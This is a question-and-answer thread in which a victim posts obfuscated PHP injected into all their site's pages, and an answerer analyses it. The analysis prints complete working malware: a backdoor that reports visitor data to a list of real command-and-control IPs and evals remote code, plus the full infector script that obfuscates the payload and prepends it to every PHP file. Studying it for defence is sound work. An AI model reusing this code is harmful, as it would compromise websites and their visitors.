Reputation: 881
I might be insane to write this here, but I am just too scared as of now. There are 2 websites that I have hosted on iPage.
All the PHP pages across both my websites were modified early this morning around 9AM and all of them have the following prefix
<?php /*db9fce8e7e3b4062309ef5d7c0193183_on*/ $TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH= array('1822','1839','1818','1829');$JN26Obrx7D= array('9042','9057','9044','9040','9059','9044','9038','9045','9060','9053','9042','9059','9048','9054','9053');$ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg= array('1379','1378','1396','1382','1335','1333','1376','1381','1382','1380','1392','1381','1382');$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K="eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0poVjFsblMwTkdiV1JYTldwa1IyeDJZbXc1YkdWSGJIcGtTRTF2U1d0a2JHUkZNV2hpVjBWcFMxTnNOMGxEUW0xa1Z6VnFaRWRzZG1KcFFuUmlNbEptV1RJNWRVdERVbWxrVjFsd1pUTk9NR05zT1hCamJWWjNZa2RHYWxwVFoybFFSMHAyV2tockswbHBkMmxRUjBwMldraHJLMGxwZDJ0WmJsWnRURU5TYW1KdVVtWmhRMnMzWVZkWlowdERVbXBpYmxKbVlVTkJPVkJUUVhoTFUwSTNTa2RLTVZwcFFUbEpTRTR3WTJ3NWNHTnRWbmRpUjBacVdsTm5hVkJIU25aYVNHc3JTV2wzYVZCSFNuWmFTR3NyU1dsQmRVbElUakJqYld4M1l6SjRhR015YUd4amVXZHJXREZPUmxWc1drWlZiSE5wV2pJNWRscERTbVJMVTNkcldXNVdiVXRVYzJkamJWWXdaRmhLZFVsRFVtbGtWMWszWmxoT01HTnNPWEJqYlZaM1lrZEdhbHBUWjJsUVF6bHBZakpTTlZCcFNYTkphbmQyV1cwNWEyVlVOR2xNUTFKcFpGZFpjMHBIVG5Wa1JqbHZTMVIwY0ZwcFFXOUtSMDUxWkVZNWIwbEVNRGxKUkVWd1NVaHphMWx1Vm0xSlJEQm5Zek5TZVZneWJIbGFXRUp6V1ZkT2JFdERTVGhNTWtwMldraHJLMGxwZUhwa1NFcHdZMGhPYzFsWVRtOWFXRTF2U2tZNVZGSldTbGRTVmtwaVNXMWtkbUl5VVdsWVUydDFTV3AzZGxsdE9XdGxWRFJwVEVOU2FXUlhXWEJQZVVKNVdsaFNNV050TkdkS1Iwb3hXbXAwT1dOdFZqQmtXRXAxU1VOU2FXUlhXVGRtVjFveFltMU9NR0ZYT1hWSlJ6bDNXVmMxY21GVFoydFpibFp0UzFoemExb3pjR1phVTBFNVNVZGFhR0pJVG14UGVWSnZXREozWjFCVFFtOWFWMFpyV2xoS2VsZ3llSEJqTTFGdlMxUjBjRnBwUVc5aFZ6Vm1XVmhLZVZsWWEyOUphMDUyWW01U2JHSnVVWFJTVnpWcVlqSlNjR0p0WXpaSlIyUTJZVmhCYVV4RFFXdGhSamx6UzFOcloyVjVRV3RhTTNCbVdsTkJPVWxJVW5sa1YxVTNabGRzYlVsRFoydGFNM0JtV2xOc04wcElVblJqUjFwMVdWY3hiRWxFTUdka1IxWjBZMGMxYUdKVFoybE1NMUowWTBOSmMwbERTa2RVTURocFMxUjBiV0ZYZUd4WU0wSXhaRVk1YW1JeU5UQmFWelV3WTNsbmEyUkhNWGRhYlRWb1lsZFZjMGxEVW1sa1YxbHdUM2xTTmxwRFFUbEpSMlEyWWpOQ2JHSnBaMnRrUnpGM1dtMDFhR0pYVlhOSlEwcDVTV2xyTjBwSFRuWmlibEpzWW01U2VrbEVNR2RhTTNCNVdsZEdhMHREVWpaYVEzZG5UVlJCZDAxRVFYZE5SRUZ3VDNsU2FtSXlOVEJhVnpVd1kzbEJPVWxITVhaYVJqbHFZakkwYjBwSFRuWmlibEpzWW01U2VrdFVkRzVsYlU1ellqTk9iRXREVWpaYVEyczNaRmMxYzJGWE5YSkxRMUl3WWxoQ2JXSnRSblJhVTJzM1NrZE9kbUp1VW14aWJsSjZTVVF3WjFvemNHeGliVTUyV2tkVmIwcEhUblppYmxKc1ltNVNla3RVZERsSlIxWnpZekpWWjJWNVVtcGlNalV3V2xjMU1HTjVRVGxKUnpGMldrWTVhbUl5Tkc5S1Iwb3hXbWxyTjJaVFVuTmFWelJuVUZOQ2VtUklTbk5hVnpSdlNrZE9kbUp1VW14aWJsSjZTMVIwYjFwWFJtdGFXRWx2U1d0T2RtSnVVbXhpYmxGMFZFZFdkVm96VW05UGFVRnBUR2xTYzFwWE5IQlBNMHBzWkVoV2VXSnBaMnRaTWpsMVpFZFdkV1JJVFhCUE16Qm5XbTVXZFZrelVuQmlNalJuVWpKV01GUlhSblJaVTJkd1pYbFNkR0l6VW05YVdFbG5VRk5CYVdRelpETk1hbXMxV1cxc01HTjVOV3BpTWpCcFR6TktiR1JJVm5saWFVRnJZbGM1TUdGSFZubFBNekYyV1d3NWVtUkhSbmxrUTJkcFlqTkNhR0p0ZEhCSmFXczNXbTVXZFZrelVuQmlNalJuV1Zkb2JXUlhVbTFpUjFvMldrZG9iV0ZJVFc5S1NFSm9TMWh6YTJKWFJuUlpVMEU1U1VWa2JHUkZNV2hpVjBWdlMxUnphMXB0YkhOYVUwRTVTVWhXZVdKSFZuVlpNamxyV2xOb1psZ3dXa3BVUlZabVdIbHJOMkZYV1dkTFIyeDZZekpXTUV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldEQm9VRlV4VVdsWVUydHdaWGxTYjJJelRqQkpSREJuU2tZNVZGSldTbGRTVmtwaVNXdG9WVlpHUW1aVFJUbFVWa05LWkU4ek1HZGFWM2g2V2xOQ04wcEhhSFpqTTFGblVGTkJhVWxxZERsaFYxbG5TMGRzZW1NeVZqQkxRMUptVlRCV1UxWnJWbE5YZVVwVFVsVXhVRlpGVm1aUlZWSkZWV2xLWkV0VGJEZEtSMngzU1VRd1owcEdPVlJTVmtwWFVsWktZa2xzU2taVVZUbFZVbFk1UWxKRlVsTkpiREEzWmxOQ2JHSklUbXhKU0hOcllWaEJaMUJUUVdsSmFuUTVZVmRaWjB0SGJIcGpNbFl3UzBOU1psVXdWbE5XYTFaVFYzbEtTVlpHVWxGWU1VcEdVbXRXVTFKV1NXbFlVMnR3WlhsU2VWcFhXV2RRVTBJeFkyMTRiR0p0VG5aYVIxVnZTa1k1VkZKV1NsZFNWa3BpU1d0b1ZWWkdRbVpWYTFaSFVsWktSbFZwU21STFZIUTVTVWRXYzJNeVZXZGxlVko1V2xkWloxQlRRV2xKYW5RNVlWZFpaMHRIYkhwak1sWXdTME5TWmxVd1ZsTldhMVpUVjNsS1NWWkdVbEZZTVZaVVVsWktabEZWWkVaVWJGRnBXRk5yY0dWNVVqRlpVMEU1U1VoV2VXSkhWblZaTWpscldsTm9lbVJJU2pCaU1uaDJaREpXZVV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldERldWRkpXU21aUlZXUkdWR3hSYVZoVGEzQlBNekJuV2xkNGVscFRRamRLU0Zab1NVUXdaMGxwU1RkbVYyeHRTVU5vY0dNelRteGtRMmRyV0RGT1JsVnNXa1pWYkhOcFZWWldSbFZzYkdaVk1WSlRVMVUxU0Vsc01IQkxXSE5yWTFoTloxQlRRakZqYlhoc1ltMU9kbHBIVlc5S1JqbFVVbFpLVjFKV1NtSkpiRVpXVWxaS1dsZ3hUbFZWYTJ4UFVubEtaRXRVZERsSlIxWnpZekpWWjJWNVVuaGplVUU1U1VOSmFVOHpNR3RrV0VweldIcEJaMUJUUVdsaFNGSXdZMFJ2ZGt4NVNXZE1hVUZyWTBkRk4wcElWbmxpUmpoNFNVUXdaMGxwT1hGYVYxSndURzVDYjJORU9USmFXRXA2WVZjNWRWQlVRVFZQVkVWdFlsYzVNR0ZIVm5sUVUwbG5UR2xTZEZsWE1XaEpRelJuU1dsYWJXRlhlR3hRVTBsblRHbEJhMXB0YkhOYVUwRjFTVU5KYldGSE9YcGtSREJwU1VNMFowcEhhSFpqTTFGblRHbEJhVXB0YkhkUVUwbG5UR2xCYTJGWVFXZE1hVUZwU201S2JGcHFNR2xKUXpSblNraEtiRnBwUVhWSlEwbHRaRmRGT1VscFFYVktTRlpvU1VNMFowbHBXbmhqZWpCcFNVTTBaMHBJUm5wUGVWSXdZMjVyWjFCVFFqQmpibFpzVHpKc2JVdERRbTFrVnpWcVpFZHNkbUpzT1d4bFIyeDZaRWhOYjBsdFRqRmpiWGhtWVZjMWNHUkRTWEJKUTJ3M1NrZE9iMGxFTUdkWk0xWjVZa1k1Y0dKdGJEQkxRMUl4WTIxNFprMURRWFZKUTFJeFkyMTRaazFUYXpkWk0xWjVZa1k1ZWxwWVVuWmpTRkZ2U2tkT2IweERRa1JXVmtwTlZERkNWVmd4U2taV1JsWlRWR3hTVTFGVk5WUlNhMVpUVEVOQmVFdFVkR3BrV0VweldETk9iR1JIT1hka1EyZHJXVEpuYzBsRlRsWlZhM2hRVlVaU1psWkZiRTVTVlRsV1ZrTjNaMDE1YXpkS1NGWnpaRU5CT1VsSVVubGhWekJ2V1ROV2VXSkdPV3hsUjFacVMwTlNhbUZEYTNCUGVWSXdZMjVyWjFCVFFtMVpWM2g2V2xSME9VbEhiRzFKUTJkdllWYzFjRmd5Wkd4a1EyZHBXVmQ0YzJJelpHWmtXRXB6V0RKYWRtTkhWblZKYVd0d1NVTlpiVWxEVWpCamJtdHdTVWh6YTJSWGVEQkpSREJuWkVoS2NHSlRhRUZhYld4eldsWTVibHBZVW1aWk1qbDFaRWRXZFdSSVRXOUtTRlo1WWtZNGQwbEROR2RLU0ZaNVlrWTRlRXRUYXpkS1NGSjVaVk5CT1VsSFdtaGlTRTVzVHpNeGNGcHBaMnRrU0VvMVMxaHphMXB1UVdkUVUwSnRZekk1YW1FeU9YZGFWelJ2U2toQ2FFeERRVFJOUTNkblNrZFdlV050TlhaTVEwRnJXbGhLZVdNelVubE1RMEY2VFVOck4yRlhXV2RMUTFKdFkwTnJaMlY1VW5aa1dGRm5VRk5CYVZJd1ZsVkpRMUl4WTIxNFprMVRRa2xXUmxKUlRIcEZkVTFHZUhsWVJ6UnBUM2xTZG1SWVVXZE1hakJuU1d0b2RtTXpVVFpKUTFKM1dWWjRlVmhITkdsUGVWSjJaRmhSWjB4cU1HZEphMDUyWW0wMWJGa3pVbkJpTWpRMlNVVk9jMkl6VG14WVNFcGpZbXg0ZVZoSE5HbFBNbG96WTIxc01GcFRaMnRhYmtGelNVTlNkbVJZVVhCUGVWSjVXbGhSWjFCVFFXbEphblF6WVVkc2MxcFRRVzlKVjFwc1lqSlpiMHBIV25kTFUydG5aWGxTZVZwWVVXZEpRelE1U1VOQ2JWb3lWakJqZVdkcldtNUJjMGxFUlhsUFEyczNabGRhYW1KSE9YcGFVMmRyV201QmNFOTVVakZpU0ZGblVGTkNNR050YkhSTFNFNHhXVzVPTUdOcFoydGpiVll3VEVOQ2VtUklTbmRpTTAxdlNraEtiR1JEZDJkSmJIaDVXRWMxWTJOc2VIVkphV3RuUzNsQk1FdFRhemRtV0RCblNVZHNiVWxEYUhwa1NFcDNZak5OYjBwSVZuTmtRM2RwV2xoYWFHSkRTWEJKUTBVNVVGTkNiVmxYZUhwYVUydzNTa2h2WjFCVFFucGtTRXB3WTBoT2MxbFlUbTlhV0Uxdll6TlNlVmd6U214alIzaG9XVEpWYjBsdFZqSlpWM2RwVEVOSmFVeERVakZpU0ZGd1MxUnpaMXBZV21oaVEyZHJaV2xyTjBsSFZqUmhXRkZ2UzFSME9XRlhXV2RMU0U0d1kyNUNkbU41WjJ0a1YzZ3dURU5LYkZsdE5XaEphV3RuU1ZRd09VbEhXbWhpU0U1c1MxaHphMWd4VGtaVmJGcEdWV3h6YVZveU9YWmFRMHBrU1VRd1oyTXpVbmxZTTBwc1kwZDRhRmt5Vlc5SmJWWnBZbTFGYVV4RFNXbE1RMUl4WWtoUmNFOHpTbXhrU0ZaNVltbENNR051Vm14UE16RnNZa2hPYkVsSWRIbGFXRkl4WTIwMFoxcHRSbk5qTWxVM1psZ3dhMXB0UmpCaFIxWjVUV3gwWkVsRU1HZEphbU0wVEdwUk1reHFSVE5OZVRSNFRrTkpOMHBIV21oa1IyaHNZMnBLWWxoVFFUbEpRMGw0VG5wWmRVOVROSGxOVkdkMVRWUnJlRWxxYzJ0YWJVWXdZVWRXZVUxc2RHUkpSREJuU1dwcmVFeHFTWGxQUXpSNFRsUlJkVTFxVlRCSmFuTnJXbTFHTUdGSFZubE5iSFJrU1VRd1owbHFZek5NYW1kNFRHcEpNRTFUTkhsT1ZFMXBUM2xTYlZsWVVtOWFXRWw1VnpFd1oxQlRRV2xOVkdjd1RHcG5lVXhxUlhoT2VUUjRUVlJCYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTVETkhsTlJFbDFUMVJOYVU5NVVtMVpXRkp2V2xoSmVWY3hNR2RRVTBGcFRrUlpkVTFxVVRWTWFsVTBUR3BGZWs1VFNUZEtSMXBvWkVkb2JHTnFTbUpZVTBFNVNVTkplRTU2V1hWUFV6UjVUa1JGZFUxVVZYZEphbk5yV20xR01HRkhWbmxOYkhSa1NVUXdaMGxxVVRKTWFrMHpUR3BGTWs5VE5ERk9hVWszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RCT2FUUjZUVU0wTUUxVE5EVlBVMGszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1RWT1F6UjVUa1JKZFUxcVZURk1hazB4U1dwemExcHRSakJoUjFaNVRXeDBaRWxFTUdkSmFrVXpUME0wZUU1cVNYVk5WRWsxVEdwSmVVMTVTVGRLUjFwb1pFZG9iR05xU21KWVUwRTVTVU5KTTA5RE5EQk9lVFI0VDBSUmRVMTZUV2xQZVZKdFdWaFNiMXBZU1hsWE1UQm5VRk5CYVUxNlJYVk5WR2N3VEdwSmVrNURORFZPYVVrM1l6Sm9NVnB0V25OYVUyZHJXbTFHTUdGSFZubE5hV3MzV20wNWVWcFhSbXBoUTJkcldtMUdNR0ZIVm5sTmFVSm9ZM2xCYTJSWVNYQmxNbXh0U1VObloxbFhhRzFrVjFKdFlrZGFObHBIYUcxaFNFMXZTa2hXZVV0VFFYQkpTSE5uV1c1S2JGbFhjMmRQTXpFNVpsRTlQU0lwS1RzZyIpKTsg")); ";if (!function_exists("IOvqWhUNav1vXbeu")){ function IOvqWhUNav1vXbeu($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU,$iPKwKwD9uDGAJlgUcL87){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW = '';foreach($eylKbLsazo94Ea5Vhz79GggPPk0Fn4I8sTIuv1vU as $vwdHH9YC8Qv5SkhOG4ZoO9){$pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW .= chr($vwdHH9YC8Qv5SkhOG4ZoO9 - $iPKwKwD9uDGAJlgUcL87);}return $pq3FLow69CrOdNpzhoTKUkk6q48236cZm5vXkSTkkbYoOdNW;}$NfcYRc72PjdDxDTcZ9Y6 = IOvqWhUNav1vXbeu($TVSC95En77BPVJfUYlq9gaYajuT5lt9kfRNeNhsKeTp0tvLhH,1721);$c6gts3vwnaRtcGbfD4VN7obA8 = IOvqWhUNav1vXbeu($JN26Obrx7D,8943);$n82mSuiYNAS8X68E = IOvqWhUNav1vXbeu($ENVOq0syj3C3itmE4ubWBPOxtQPQNixJVjoc9GAjz3dImpdg,1281);$TargEl = $c6gts3vwnaRtcGbfD4VN7obA8('$bigiJelZcd',$NfcYRc72PjdDxDTcZ9Y6.'('.$n82mSuiYNAS8X68E.'($bigiJelZcd));');$TargEl($cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K);} /*db9fce8e7e3b4062309ef5d7c0193183_off*/ ?>
I tried reaching iPage support and they have no idea as to what has happened. They just created a support ticket for me which will be looked into within 48 hours!!
UPDATE
Got an email about the hack
From: poor victim [email protected]
Message: Why is this code on my server? why are you hacking my files??? this code points back to you!!! Prepare for a lawsuit
if (!function_exists("GetMama")){ function mod_con($buf){ str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) { $buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf); return $buf; }str_ireplace("","",$buf,$cnt_h);if ($cnt_h == 1) { $buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf); return $buf; }return $buf; }function opanki($buf){ $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true; }if ($gz_e){ $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents); } else {$contents = mod_con($buf); }$len = strlen($contents);header("Content-Length: ".$len);return($contents); } function GetMama(){ $mother = "www.99bits.com";return $mother; }ob_start("opanki");function ahfudflfzdhfhs($pa){ $mama = GetMama();$file = urlencode(FILE);if (isset($_SERVER["HTTP_HOST"])){ $host = $_SERVER["HTTP_HOST"]; } else {$host = ""; }if (isset($_SERVER["REMOTE_ADDR"])){ $ip = $_SERVER["REMOTE_ADDR"]; } else {$ip = ""; }if (isset($_SERVER["HTTP_REFERER"])){ $ref = urlencode($_SERVER["HTTP_REFERER"]); } else {$ref = ""; }if (isset($_SERVER["HTTP_USER_AGENT"])){ $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"])); } else {$ua = ""; }if (isset($_SERVER["QUERY_STRING"])){ $qs = urlencode($_SERVER["QUERY_STRING"]); } else {$qs = ""; }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){ $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false; } if ((ini_get("allow_url_fopen")) && $try) { $ult = trim(@file_get_contents($url_0 . $url_1));$try = false; }if($try){ $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) { $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) { $ret .= fgets($fp, 128); }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4)); } } if (strpos($ult,"eval") !== false){ $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit(); }if (strpos($ult,"ebna") !== false){ $_SERVER["good"] = str_replace("ebna","",$ult);return true; }else {return false; } }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){ if ( ahfudflfzdhfhs($ur) ) { break ; } } }
Sent from (ip address): 64.118.163.18 (64.118.163.18) Date/Time: April 9, 2012 7:15 pm Coming from (referer): http://www.99bits.com/contact-us/ Using (user agent): Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.151 Safari/535.19
Thanks to each one of you for all the help and knowledge. For some strange and unknown reason my blog was the targeted in this hack attempt. I've closed the blog for time being, until I can clean up all the files (as all my PHP files are infected).
Upvotes: 3
Views: 2412
Reputation: 42612
In the current form the script has the following command-and-control servers ("c&c"):
$father2[] = "78.46.173.14";
$father2[] = "176.9.218.191";
$father2[] = "91.228.154.254";
$father2[] = "77.81.241.253";
$father2[] = "184.82.117.110";
$father2[] = "46.4.202.93";
$father2[] = "46.249.58.135";
$father2[] = "176.9.241.150";
$father2[] = "46.37.169.56";
$father2[] = "46.30.41.99";
$father2[] = "94.242.255.35";
$father2[] = "178.162.129.223";
$father2[] = "78.47.184.33";
$father2[] = "31.184.234.96";
The script randomizes the order of them on each run. Then it trys to send a GET request containing these variables
$_SERVER["HTTP_HOST"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["QUERY_STRING"]
__FILE__
to the first c&c server, if the response does not contain eval
or ebna
(or the server is down) it trys the next c&c server and so on.
In case the c&c server returns: ebna <somestring>
, <somestring>
will be placed inside the body tag of your website. So the hacker can insert arbitrary html/js code.
In the other case where the c&c server returns eval <somestring>
, <somestring>
will be passed to eval(). That way the hacker can even execute arbitrary php code.
I managed to get the c&c server to return an eval response by just ommiting all url parameters, like this: http://<server-ip>/jedi.php
, here is the response:
eval $try = true;
if (function_exists("curl_init")) {
$ch = curl_init('http://2brewers.com/99.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;
}
if ((ini_get('allow_url_fopen')) && $try) {
$ult = trim(@file_get_contents('http://2brewers.com/99.txt'));
$try = false;
}
if ($try) {
$fp = fsockopen('2brewers.com', 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET /99.txt HTTP/1.0\r\n";
$out. = "Host: 2brewers.com\r\n";
$out. = "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = '';
while (!feof($fp)) {
$ret. = fgets($fp, 128);
}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
}
$xx = 'ev'.'al';
$_FILE = create_function('$_', $xx.'($_);');
$_FILE($ult);
that loads and executes http://2brewers.com/99.txt
, which looks like this:
function get_file_extension($file_name) {
return substr(strrchr($file_name, '.'), 1);
}
function pass_gen($dol) {
$source[0] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$source[1] = "0123456789";
$length = rand(5, 50);
$passwordlen = intval($length) - 1;
$use = implode("", $source);
$max_num = strlen($use) - 1;
$rp = '';
for ($i = 0; $i < $passwordlen; $i++) {
$x = rand(0, $max_num);
$rp. = $use[$x];
}
if ($dol) {
return '$'.$source[0][rand(0, strlen($source[0]) - 1)].$rp;
} else {
return $source[0][rand(0, strlen($source[0]) - 1)].$rp;
}
}
function GetMass($text, $code, $massname) {
$a = str_split($text);
foreach($a as $b) {
$evmas[] = ord($b) + $code;
}
$z = $massname."= array('".implode("','", $evmas)."');";
return $z;
}
function Codee($code) {
$coo = 'if (!function_exists("F1")){ function F1($v6,$v7){$v8 = \'\';foreach($v6 as $v9){$v8 .= chr($v9 - $v7);}return $v8;}$v1 = F1($mas1,$code1);$v2 = F1($mas2,$code2);$v3 = F1($mas3,$code3);$v4 = $v2(\'$v5\',$v1.\'(\'.$v3.\'($v5));\');$v4($v0);}';
$f1 = pass_gen(false);
$coo = str_replace('F1', $f1, $coo);
$v1 = pass_gen(true);
$coo = str_replace('$v1', $v1, $coo);
$v2 = pass_gen(true);
$coo = str_replace('$v2', $v2, $coo);
$v3 = pass_gen(true);
$coo = str_replace('$v3', $v3, $coo);
$v4 = pass_gen(true);
$coo = str_replace('$v4', $v4, $coo);
$v5 = pass_gen(true);
$coo = str_replace('$v5', $v5, $coo);
$v6 = pass_gen(true);
$coo = str_replace('$v6', $v6, $coo);
$v7 = pass_gen(true);
$coo = str_replace('$v7', $v7, $coo);
$v8 = pass_gen(true);
$coo = str_replace('$v8', $v8, $coo);
$v9 = pass_gen(true);
$coo = str_replace('$v9', $v9, $coo);
$v0 = pass_gen(true);
$coo = str_replace('$v0', $v0, $coo);
$mas1 = pass_gen(true);
$coo = str_replace('$mas1', $mas1, $coo);
$mas2 = pass_gen(true);
$coo = str_replace('$mas2', $mas2, $coo);
$mas3 = pass_gen(true);
$coo = str_replace('$mas3', $mas3, $coo);
$code1 = rand(1000, 10000);
$coo = str_replace('$code1', $code1, $coo);
$code2 = rand(1000, 10000);
$coo = str_replace('$code2', $code2, $coo);
$code3 = rand(1000, 10000);
$coo = str_replace('$code3', $code3, $coo);
for ($i = 0; $i < 3; $i++) {
$code = base64_encode($code);
$code = 'eval(base64_decode("'.$code.'")); ';
}
$code = base64_encode($code);
$z = GetMass('eval', $code1, $mas1);
$z. = GetMass('create_function', $code2, $mas2);
$z. = GetMass('base64_decode', $code3, $mas3);
$z. = $v0.'="'.$code.'";';
$z. = $coo;
return $z;
}
function modify($fname) {
$tmp = file_get_contents($fname);
$md_start = md5($tmp);
chmod($fname, 0666);
$md = md5($fname);
$pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pattern = '/<\?php[\s]*\?>/i';
$replacement = '';
$tmp = preg_replace($pattern, $replacement, $tmp);
$pos = strpos($tmp, 'GetMama');
$pos2 = strpos($tmp, 'god_mode_on');
if (($pos === false) && ($pos2 === false)) {
$code_t = 'if (!function_exists("GetMama")){ function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret .= fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}} if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
$mama = 'wtf';
$mama = $_SERVER["HTTP_HOST"];
$code_t = str_replace('###', $mama, $code_t);
$code = '<'.'?php ';
$prob = rand(5, 500);
for ($i = 0; $i < 700 + $prob; $i++) {
$code = $code.' ';
}
$code_t = Codee($code_t);
$code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;
$f = fopen($fname, "w");
fputs($f, $code);
fclose($f);
}
chmod($fname, 0644);
}
function dir_num($dir) {
global $fileslist;
static $deep = 0;
$odir = @opendir($dir);
while (($file = @readdir($odir)) !== FALSE) {
if ($file == '.' || $file == '..') {
continue;
} else {
echo '. ';
if (
get_file_extension($file) == 'php') {
modify($dir.DIRECTORY_SEPARATOR.$file);
}
}
if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
$deep++;
dir_num($dir.DIRECTORY_SEPARATOR.$file);
$deep--;
}
}@closedir($odir);
}
Echo 'Wait please...<br>';
$dir = dirname(__FILE__);
dir_num($dir);
